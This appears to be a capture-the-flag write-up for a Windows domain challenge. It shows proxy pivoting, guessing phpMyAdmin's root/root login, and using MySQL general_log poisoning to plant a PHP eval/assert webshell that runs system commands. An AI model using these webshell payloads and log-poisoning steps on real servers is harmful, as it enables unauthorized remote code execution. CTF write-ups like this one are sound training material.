question
题目描述:
windows域环境权限不好配,还请各位师傅高抬贵手,不要搅屎
c段只用到了0-20,不需要扫21-255,端口也只开放了常用端口。
web.lctf.com中有个域用户是web.lctf.com\buguake,密码是172.21.0.8的本地管理员密码
188.131.161.90
nmap scan in first.Recent web pentest like to give socks5
➜ ubuntu nmap -p 1000-1100 188.131.161.90
Starting Nmap 7.01 ( https://nmap.org ) at 2018-11-20 00:50 CST
Nmap scan report for 188.131.161.90
Host is up (0.048s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
1083/tcp open ansoft-lm-1
1084/tcp open ansoft-lm-2
1088/tcp open cplscrambler-al
1089/tcp open ff-annunc
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds
go with proxy!
export all_proxy=socks5://188.131.161.90:1083
Visit http://172.21.0.1
Hello World
try for http://172.21.0.1/phpinfo.php
found it with phpstudy,try login phpmyadmin with weak password
root
root phpmyadmin
root root
use general_log
select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'c:/phpStudy/PHPTutorial/WWW/cmd.php'
result
#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
change way
set global general_log='on';
SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/xyzz1.php';
SELECT '<?php assert($_GET["cmd"]);?>';
get webshell~~~
visit it
http://172.21.0.8/xyzz1.php?cmd=system(%22whoami%22)
C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with: TCP Port: 3306, Named Pipe: MySQL Time Id Command Argument 364 Init DB mysql 364 Query SELECT 'pupiles-pc\administrator ' 364 Query SHOW TABLE STATUS FROM `mysql` LIKE 'general\_log%' 364 Query SELECT COUNT(*) FROM `mysql`.`general_log` 364 Query SHOW CREATE TABLE `mysql`.`general_log` 364 Quit
emmm,the website is closed.give up!
from Nu1L’s wp,next with ms17-010 ,ms14-068—-
Nu1L’s wp:[wp]https://xz.aliyun.com/t/3341#toc-18